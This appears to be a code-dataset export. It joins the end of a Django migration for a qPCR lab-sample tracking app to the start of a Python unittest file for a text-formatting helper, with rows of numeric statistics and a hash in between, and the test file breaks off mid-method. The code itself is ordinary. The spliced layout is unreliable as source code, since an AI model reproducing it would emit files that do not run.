('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Sample')),
],
options={
'verbose_name': 'historical final concentrated sample volume',
'db_table': 'lili_finalconcentratedsamplevolumehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='FinalConcentratedSampleVolume',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('final_concentrated_sample_volume', models.DecimalField(decimal_places=100, max_digits=120, validators=[django.core.validators.MinValueValidator(Decimal('1E-100'))])),
('notes', models.TextField(blank=True)),
('concentration_type', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='finalconcentratedsamplevolumes', to='liliapi.ConcentrationType')),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='finalconcentratedsamplevolume_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='finalconcentratedsamplevolume_modifier', to=settings.AUTH_USER_MODEL)),
('sample', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='finalconcentratedsamplevolume', to='liliapi.Sample')),
],
options={
'db_table': 'lili_finalconcentratedsamplevolume',
},
),
migrations.CreateModel(
name='FilterTypeHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('matrix', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Matrix')),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical filter type',
'db_table': 'lili_filtertypehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.AddField(
model_name='filtertype',
name='matrix',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='filtertypes', to='liliapi.Matrix'),
),
migrations.AddField(
model_name='filtertype',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='filtertype_modifier', to=settings.AUTH_USER_MODEL),
),
migrations.CreateModel(
name='FieldUnitHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('table', models.CharField(max_length=64)),
('field', models.CharField(max_length=64)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('unit', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Unit')),
],
options={
'verbose_name': 'historical field unit',
'db_table': 'lili_fieldunithistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='ExtractionMethodHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical extraction method',
'db_table': 'lili_extractionmethodhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='ExtractionMethod',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='extractionmethod_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='extractionmethod_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_extractionmethod',
},
),
migrations.CreateModel(
name='ExtractionBatchHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('re_extraction_notes', models.TextField(blank=True)),
('extraction_number', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('extraction_volume', liliapi.models.NonnegativeDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('extraction_date', models.DateField(db_index=True, default=datetime.date.today)),
('pcr_date', models.DateField(db_index=True, default=datetime.date.today)),
('qpcr_template_volume', models.DecimalField(decimal_places=10, default=6, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('elution_volume', liliapi.models.NonzeroDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('sample_dilution_factor', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('qpcr_reaction_volume', models.DecimalField(decimal_places=10, default=20, max_digits=20, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('ext_pos_dna_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('ext_pos_dna_invalid', models.BooleanField(default=True)),
('inh_pos_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('analysis_batch', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.AnalysisBatch')),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('extraction_method', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ExtractionMethod')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('inh_pos_nucleic_acid_type', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.NucleicAcidType')),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('re_extraction', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.ExtractionBatch')),
],
options={
'verbose_name': 'historical extraction batch',
'db_table': 'lili_extractionbatchhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.AddField(
model_name='extractionbatch',
name='extraction_method',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='extractionbatches', to='liliapi.ExtractionMethod'),
),
migrations.AddField(
model_name='extractionbatch',
name='inh_pos_nucleic_acid_type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, to='liliapi.NucleicAcidType'),
),
migrations.AddField(
model_name='extractionbatch',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='extractionbatch_modifier', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='extractionbatch',
name='re_extraction',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='extractionbatches', to='liliapi.ExtractionBatch'),
),
migrations.CreateModel(
name='ConcentrationTypeHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical concentration type',
'db_table': 'lili_concentrationtypehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='AnalysisBatchTemplateHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('description', models.TextField(blank=True)),
('extraction_volume', liliapi.models.NonnegativeDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('elution_volume', liliapi.models.NonzeroDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('target', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Target')),
],
options={
'verbose_name': 'historical analysis batch template',
'db_table': 'lili_analysisbatchtemplatehistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='AnalysisBatchTemplate',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('description', models.TextField(blank=True)),
('extraction_volume', liliapi.models.NonnegativeDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('elution_volume', liliapi.models.NonzeroDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='analysisbatchtemplate_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='analysisbatchtemplate_modifier', to=settings.AUTH_USER_MODEL)),
('target', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='analysisbatchtemplates', to='liliapi.Target')),
],
options={
'db_table': 'lili_analysisbatchtemplate',
},
),
migrations.CreateModel(
name='AnalysisBatchHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('name', models.CharField(db_index=True, max_length=128)),
('analysis_batch_description', models.CharField(blank=True, max_length=128)),
('analysis_batch_notes', models.CharField(blank=True, max_length=128)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical analysis batch',
'db_table': 'lili_analysisbatchhistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='AliquotHistory',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(blank=True, editable=False, null=True)),
('aliquot_number', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('frozen', models.BooleanField(default=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('freezer_location', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.FreezerLocation')),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='liliapi.Sample')),
],
options={
'verbose_name': 'historical aliquot',
'db_table': 'lili_aliquothistory',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.AlterUniqueTogether(
name='pcrreplicatebatch',
unique_together={('extraction_batch', 'target', 'replicate_number', 're_pcr')},
),
migrations.CreateModel(
name='PCRReplicate',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('replicate_concentration', models.DecimalField(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(Decimal('1E-100'))])),
('invalid', models.BooleanField(default=True)),
('concentration_unit', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='pcrreplicates', to='liliapi.Unit')),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='pcrreplicate_creator', to=settings.AUTH_USER_MODEL)),
('invalid_override', models.ForeignKey(null=True, on_delete=django.db.models.deletion.PROTECT, related_name='pcrreplicates', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='pcrreplicate_modifier', to=settings.AUTH_USER_MODEL)),
('pcrreplicate_batch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pcrreplicates', to='liliapi.PCRReplicateBatch')),
('sample_extraction', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pcrreplicates', to='liliapi.SampleExtraction')),
],
options={
'db_table': 'lili_pcrreplicate',
'unique_together': {('sample_extraction', 'pcrreplicate_batch')},
},
),
migrations.AlterUniqueTogether(
name='inhibition',
unique_together={('sample', 'extraction_batch', 'nucleic_acid_type')},
),
migrations.CreateModel(
name='FinalSampleMeanConcentration',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('final_sample_mean_concentration', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='finalsamplemeanconcentration_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='finalsamplemeanconcentration_modifier', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='finalsamplemeanconcentrations', to='liliapi.Sample')),
('target', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='finalsamplemeanconcentrations', to='liliapi.Target')),
],
options={
'db_table': 'lili_finalsamplemeanconcentration',
'ordering': ['sample', 'id'],
'unique_together': {('sample', 'target')},
},
),
migrations.CreateModel(
name='FieldUnit',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('table', models.CharField(max_length=64)),
('field', models.CharField(max_length=64)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='fieldunit_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='fieldunit_modifier', to=settings.AUTH_USER_MODEL)),
('unit', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='fieldunits', to='liliapi.Unit')),
],
options={
'db_table': 'lili_fieldunit',
'unique_together': {('table', 'field')},
},
),
migrations.AlterUniqueTogether(
name='extractionbatch',
unique_together={('analysis_batch', 'extraction_number', 're_extraction')},
),
migrations.CreateModel(
name='Aliquot',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('aliquot_number', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('frozen', models.BooleanField(default=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='aliquot_creator', to=settings.AUTH_USER_MODEL)),
('freezer_location', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='aliquots', to='liliapi.FreezerLocation')),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='aliquot_modifier', to=settings.AUTH_USER_MODEL)),
('sample', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='aliquots', to='liliapi.Sample')),
],
options={
'db_table': 'lili_aliquot',
'unique_together': {('sample', 'aliquot_number')},
},
),
]
| 81.846535
| 223
| 0.648415
| 14,126
| 132,264
| 5.856506
| 0.02145
| 0.044096
| 0.043322
| 0.068078
| 0.929323
| 0.922941
| 0.913549
| 0.908098
| 0.904979
| 0.899539
| 0
| 0.010199
| 0.206027
| 132,264
| 1,615
| 224
| 81.897214
| 0.777592
| 0.000348
| 0
| 0.733209
| 1
| 0
| 0.160941
| 0.036478
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.004975
| 0
| 0.007463
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6eb0856ff37a9b81b52a7dda960ea391bf619e06
| 10,251
|
py
|
Python
|
test/utilities/test_print_formatter.py
|
thomaspenin/orchid-font-tool
|
c064a5ddd582393e462fd7411eae250944a6f7e5
|
[
"MIT"
] | null | null | null |
test/utilities/test_print_formatter.py
|
thomaspenin/orchid-font-tool
|
c064a5ddd582393e462fd7411eae250944a6f7e5
|
[
"MIT"
] | null | null | null |
test/utilities/test_print_formatter.py
|
thomaspenin/orchid-font-tool
|
c064a5ddd582393e462fd7411eae250944a6f7e5
|
[
"MIT"
] | null | null | null |
import unittest
from src.utilities.print_formatter import PrintFormatter
from src.utilities.print_formatter import Color;
class PublicPrintFormatter(PrintFormatter):
"""Public class to test PrintFormatter private methods"""
def __init__(self, arg):
super(PublicPrintFormatter, self).__init__()
self.arg = arg
@staticmethod
def public_remove_format_marks(str):
return PrintFormatter._remove_format_marks(str)
@staticmethod
def public_remove_line_breaks(str):
return PrintFormatter._remove_line_breaks(str)
class PrintFormatterTestCase(unittest.TestCase):
# Test _remove_line_breaks
def test_remove_line_breaks_remove(self):
"""Test that the method actually removes line breaks"""
test_str = "\ntest\n\n bold\n str"
clean_str = PublicPrintFormatter.public_remove_line_breaks(test_str)
self.assertEqual(clean_str, "test bold str")
def test_remove_line_breaks_removes_leading_trailing_spaces(self):
"""Test that the method removes leading and trailing spaces"""
test_str = " test bold str "
clean_str = PublicPrintFormatter.public_remove_line_breaks(test_str)
self.assertEqual(clean_str, "test bold str")
def test_remove_line_breaks_preserves_string(self):
"""Test that the method preserves strings without line breaks, leading or trailing spaces"""
test_str = "test bold str"
clean_str = PublicPrintFormatter.public_remove_line_breaks(test_str)
self.assertEqual(clean_str, "test bold str")
# Test _remove_format_marks
def test_remove_format_mark_bold(self):
"""Test that the method to remove format marks works with bold"""
test_str = "test " + Color.BOLD + "bold" + Color.END + " str"
clean_str = PublicPrintFormatter.public_remove_format_marks(test_str)
self.assertEqual(clean_str, "test bold str")
def test_remove_format_mark_no_mark(self):
"""Test that the method to remove format marks leaves str untouched when nothing to do"""
test_str = "test clean str"
clean_str = PublicPrintFormatter.public_remove_format_marks(test_str)
self.assertEqual(clean_str, test_str)
test_str2 = ""
clean_str2 = PublicPrintFormatter.public_remove_format_marks(test_str2)
self.assertEqual(clean_str2, test_str2)
# Test title
def test_title_line_breaks(self):
"""Test that the result begins and ends with a line break"""
test_str = "test str"
formatted_str = PrintFormatter.title(test_str)
str_length = len(formatted_str)
self.assertTrue(str_length > 2)
self.assertEqual(formatted_str[0], '\n')
self.assertEqual(formatted_str[str_length - 1], '\n')
def test_title_is_bold(self):
"""Test that the result format is surrounded by bold commands"""
test_str = "test str"
formatted_str = PrintFormatter.title(test_str)
str_length = len(formatted_str)
self.assertTrue(str_length > 8)
self.assertEqual(formatted_str.find('\033[1m'), 1)
self.assertEqual(formatted_str.find('\033[0m'), str_length - 5)
def test_title_is_upper(self):
"""Test that the content to format is kept as upper case"""
test_str = "test str"
formatted_str = PrintFormatter.title(test_str)
self.assertEqual(formatted_str.count(test_str.upper()), 1)
def test_title_empty_string(self):
"""Test that the result is an empty string for an empty string"""
test_str = ""
formatted_str = PrintFormatter.title(test_str)
self.assertEqual(formatted_str, "")
def test_title_containing_formatting(self):
"""Test that title is correct when there was already formatting marks
(internal formatting shall be removed)
"""
test_str = "test " + Color.BOLD + "bold" + Color.END + " str"
formatted_str = PrintFormatter.title(test_str)
self.assertEqual(formatted_str, "\n\033[1mTEST BOLD STR\033[0m\n")
def test_title_removes_inner_line_breaks(self):
"""Test that inner line breaks are removed"""
test_str = "test\nbroken\nstr"
formatted_str = PrintFormatter.title(test_str)
str_length = len(formatted_str)
self.assertEqual(formatted_str, "\n\033[1mTEST BROKEN STR\033[0m\n")
# Test section
def test_section_line_breaks(self):
"""Test that the result begins and ends with a line break"""
test_str = "test str"
formatted_str = PrintFormatter.section(test_str)
str_length = len(formatted_str)
self.assertTrue(str_length > 2)
self.assertEqual(formatted_str[0], '\n')
self.assertEqual(formatted_str[str_length - 1], '\n')
def test_section_is_bold(self):
"""Test that the result format is surrounded by bold commands"""
test_str = "test str"
formatted_str = PrintFormatter.section(test_str)
str_length = len(formatted_str)
self.assertTrue(str_length > 8)
self.assertEqual(formatted_str.find('\033[1m'), 1)
self.assertEqual(formatted_str.find('\033[0m'), str_length - 5)
def test_section_is_upper(self):
"""Test that the content to format is kept as upper case"""
test_str = "test str"
formatted_str = PrintFormatter.section(test_str)
self.assertEqual(formatted_str.count(test_str.upper()), 1)
def test_section_empty_string(self):
"""Test that the result is an empty string for an empty string"""
test_str = ""
formatted_str = PrintFormatter.section(test_str)
self.assertEqual(formatted_str, "")
def test_section_containing_formatting(self):
"""Test that title is correct when there was already formatting marks
(internal formatting shall be removed)
"""
test_str = "test " + Color.BOLD + "bold" + Color.END + " str"
formatted_str = PrintFormatter.section(test_str)
self.assertEqual(formatted_str, "\n\033[1mTEST BOLD STR\033[0m\n")
def test_section_removed_inner_line_breaks(self):
"""Test that inner line breaks are removed"""
test_str = "test\nbroken\nstr"
formatted_str = PrintFormatter.section(test_str)
str_length = len(formatted_str)
self.assertEqual(formatted_str, "\n\033[1mTEST BROKEN STR\033[0m\n")
# Test paragraph
def test_paragraph_line_breaks(self):
"""Test that the result begins and ends with a line break"""
test_str = "test str"
formatted_str = PrintFormatter.paragraph(test_str)
str_length = len(formatted_str)
self.assertTrue(str_length > 2)
self.assertEqual(formatted_str[0], '\n')
self.assertEqual(formatted_str[str_length - 1], '\n')
def test_paragraph_is_indented(self):
"""Test that the result format is properly indented"""
test_str = "test str"
formatted_str = PrintFormatter.paragraph(test_str)
str_length = len(formatted_str)
self.assertEqual(formatted_str, "\n test str\n")
def test_paragraph_empty_string(self):
"""Test that the result is an empty string for an empty string"""
test_str = ""
formatted_str = PrintFormatter.paragraph(test_str)
self.assertEqual(formatted_str, "")
def test_paragraph_containing_formatting(self):
